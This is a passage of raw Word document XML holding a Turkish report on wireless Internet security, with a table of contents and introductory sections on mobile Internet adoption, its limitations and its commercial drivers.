      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015113A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>İçindekiler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">                                            Sayfa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00412EEB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00412EEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Giriş</w:t>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t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00412EEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00412EEB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00412EEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Kablosuz İnternet Kimdir?</w:t>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t xml:space="preserve"> </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w:t>
      </w:r>
      <w:r w:rsidRPr="00412EEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>15-16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00412EEB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00412EEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Uygulama Türleri Nelerdir?</w:t>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t xml:space="preserve"> </w:t>
      </w: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16-17</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00412EEB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Liste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Güvenli İletim Yöntemleri Nasıl</w:t>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t xml:space="preserve">      </w:t>
      </w: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17-18</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00412EEB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00412EEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">Frekans Bölmeli Çoklu Erişim (FDMA) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00412EEB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:ind w:left="792"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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Teknolojisi</w:t>
      </w:r>
      <w:r w:rsidRPr="00412EEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w: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 xml:space="preserve">18   </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 xml:space="preserve">Zaman Bölmeli Çoklu Erişim (TDMA) Teknolojisi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">  18-19     </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Mobil İletişim için Global Sistemler (GSM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00412EEB">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19-20</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Kod Bölmeli Çoklu Erişim (CDMA) Teknolojisi</w:t>
      </w:r>
      <w:r w:rsidRPr="00412EEB">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 xml:space="preserve">   20-21</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Diğer Yöntemler</w:t>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 xml:space="preserve">   21</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00412EEB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Liste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Güvenli Kablosuz Cihazlar Nasıl?</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22</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000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Doğrulama</w:t>
      </w:r>
      <w:r w:rsidRPr="00412EEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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22-23</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hyperlink r:id="rId84" w:history="1">
        <w:r w:rsidRPr="00412EEB">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>Gizlilik</w:t>
        </w:r>
      </w:hyperlink>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sidRPr="00412EEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   23</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Kötü Amaçlı Kod ve Virüsler</w:t>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r>
      <w:r w:rsidRPr="00412EEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>23-</w:t>
      </w:r>
      <w:r w:rsidRPr="00412EEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00412EEB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Liste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Güvenli Ağ Altyapı Bileşenleri Nasıl?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">                              24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00412EEB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>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WAP'taki Boşluk”</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24-25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00412EEB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>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WAP Ağ Geçidi Mimarileri</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25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00412EEB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="2"/>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Servis Sağlayıcıdaki WAP Ağ Geçidi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">            25-26</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00412EEB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="2"/>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lastRenderedPageBreak/>
        <w:t>Ana Bilgisayardaki WAP Ağ Geçidi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   26-27</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="2"/>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 xml:space="preserve">Servis Sağlayıcı’nın WAP Ağ </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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00412EEB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF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rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00412EEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Geçidinden Host’un WAP Proxy'sine Geçiş</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">      28-29</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412EEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>7.Sonuç</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29-30</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00412EEB"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Pr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Kaynakça</w:t>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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   30</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003D3E43" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF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Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003D3E43" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF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Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003D3E4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r w:rsidRPr="003D3E43">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003D3E4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212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pP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44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008B667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sidRPr="008B6670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>1.Giriş</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4F7E7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>O zamanlar ticaret ve güvenlik, gündemde yüksek değildi (ağın kullanılabilirliğini korumak hariç). İnterneti ilk günlerde ticarileştirme düşüncesi neredeyse hiç duyulmamıştı. Aslında, İnternet'in ürün ve hizmet satmak için kullanılması uygunsuz görüldü. Ticari faaliyetler ve güvenlik ihtiyaçları, son birkaç yılda güçlü bir şekilde ortaya çıkan İnternet üzerinde daha yeni bir gelişmed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4F7E7A"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4F7E7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Bugün, aksine, kablosuz İnternet, ticaretin başından beri itici güç olarak tasarlanıyor. Dünyanın dört bir yanındaki milletler ve kuruluşlar, çizim işi umudunda altyapı, iletim sıklıkları, teknoloji ve uygulamaları satın almak için milyonlarca hatta milyarlarca dolar harcıyor. Bazı açılardan bu, yeni binyılın “toprak acelesi” haline geldi. O zaman, güvenliğin de erken dönemde kritik bir rol oynaması gerektiği anlamına gelir - paranın el değiştirdiği yerlerde, güvenlik bu aktiviteye eşlik etmelid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4F7E7A"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4F7E7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">Kablosuz endüstrisi henüz başlangıç ​​aşamasında olsa da, kablosuz İnternet için cihazlar, altyapı ve uygulama geliştirme dünya çapında hızla artmaktadır. Öngörüsü olanlar, güvenliğin bu tasarımların başlarında yapmaması gerektiğini bileceklerdir. Bu </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7E7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>bölümün amacı, gelişmekte olan bu sektörde ele alınması gereken önemli güvenlik sorunlarından bazılarını vurgulamaktır. Bunlar, kablosuz bir İnternet servisini veya uygulamasını dağıtmak isteyen herhangi bir işletmenin, kendi işletmelerini ve müşterilerini korumak ve bu yeni sınırdaki yatırımlarını korumak için göz önünde bulundurmaları gerekeceği konusundaki endişele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4F7E7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Bu arada, bu bölümün odağında dizüstü bilgisayarlar ve kablosuz modemler kullanarak İnternete erişmekle ilgili değil. Uzun yıllardır var olan bu teknoloji, çoğu durumda, geleneksel kablolu İnternet erişiminin bir uzantısıdır. Bu bölüm de mutlaka İnternet tabanlı olmayan, ancak bölümleri kendi başlarına hak eden kablosuz LAN ve Bluetooth konularına odaklanmayacak. Aksine, konsantrasyon doğal olarak cep telefonları ve PDA'lar (kişisel dijital asistanlar) gibi normal bilgisayarlardan çok daha az bilgi işlem kaynağına sahip taşınabilir İnternet cihazlarındadır. Bu nedenle, bu aygıtlar, farklı teknolojilerle başa çıkmak için farklı programlama dilleri, protokoller, şifreleme yöntemleri ve güvenlik perspektifleri gerektirir. Bununla birlikte, küçük boyutlarına ve sınırlamalarına rağmen, bu cihazların, özellikle kendileri için tasarlanan elektronik ticaret ve intranetle ilgili uygulamalar nedeniyle bilgi güvenliği üzerinde önemli bir etkiye sahip olduğunu belirtmek önemlidi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4F7E7A"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sidRPr="00BA434F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>METERYAL VE YÖNTEM</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Pr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>2.Kablosuz</w:t>
      </w:r>
      <w:r w:rsidRPr="006F40D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> İ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>nternet Kimdir</w:t>
      </w:r>
      <w:r w:rsidRPr="006F40D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>?</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6F40D5"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Günümüzde, kablosuz İnternet kullanıcılarının sayısının yakında milyonlarca kablolu İnternet kullanıcısını geçeceğini gösteren birçok çalışma ve tahmin bulunmaktadır. Varsayım, zaten dışarıda olan milyonlarca dünya çapında cep telefonu kullanıcısına, her gün binlerce insanın kattığı bir popülasyona dayanıyor. Bu mobil kullanıcıların her biri internete cep telefonları üzerinden erişmeyi seçerse, bu nüfus gerçekten de kablolu internet kullanıcılarının sayısını birkaç kez kolayca aşabilir. Bu çok büyük bir potansiyel, bu büyümekte olan sanayiye yatırım yapma ümidiyle önemli kaynaklar ve yatırımlar tahsis eden birçok işletmeye sahip.</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 xml:space="preserve">Kablosuz İnternet hala çok genç. Birçok cep telefonu kullanıcısı henüz cep telefonlarından internete erişemiyor. Çoğu, hangi hizmetlerin sağlanacağını görmek için “bekle ve gör” tavrı alıyor. Kablosuz İnternet erişimi olan çoğu kişi, bu hizmetin sağlayabileceği potansiyeli deneyen ilk uygulayıcılar. Kablosuz cihazlardaki ciddi sınırlamalar nedeniyle - küçük ekranlar, son derece sınırlı bant genişliği ve diğer sorunlar - hem kablolu hem de kablosuz Internet erişimine sahip çoğu kullanıcı, bugün için kablosuz cihazların masaüstünün yerini almayacağını itiraf edecek İnternete ulaşmanın birincil yolu olarak bilgisayarları ve dizüstü bilgisayarları her </w:t>
      </w:r>
      <w:r w:rsidRPr="006F40D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>zaman. Birçoğu, bugün kablosuz bir cihaz kullanarak “interneti taramanın” hayal kırıklığı yaratan bir egzersiz olabileceğini itiraf ediyor. Bu kablosuz İnternet kullanıcılarının çoğu, aşağıdaki sıkıntıları dile getirdi:</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İnternete bağlanmak için çok yavaş .</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 xml:space="preserve">Hareket halindeyken, mobil kullanıcıların oturumun ortasında bağlantısı kesilebilir. Sayısal tuş takımı kullanarak cümleleri yazmak zahmetlidir. </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 xml:space="preserve">Kablosuz interneti, özellikle dakika başına faturalandırıldığında kullanmak pahalıdır. </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Kablosuz cihazlarda çok az veya hiç grafik görüntüleme özelliği yoktur.</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 xml:space="preserve">Ekranlar çok küçük ve kullanıcıların uzun bir mesajı okumak için sürekli kaydırma yapması gerekiyor. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D511FC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Web siteleriyle ilgili sık karşılaşılan hatalar var (temel olarak günümüzde çoğu Web sitesi henüz kablosuz İnternet uyumlu değil).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008B667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sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008B667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Pr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>3.Uygulama Türleri Nelerdir</w:t>
      </w:r>
      <w:r w:rsidRPr="006F40D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
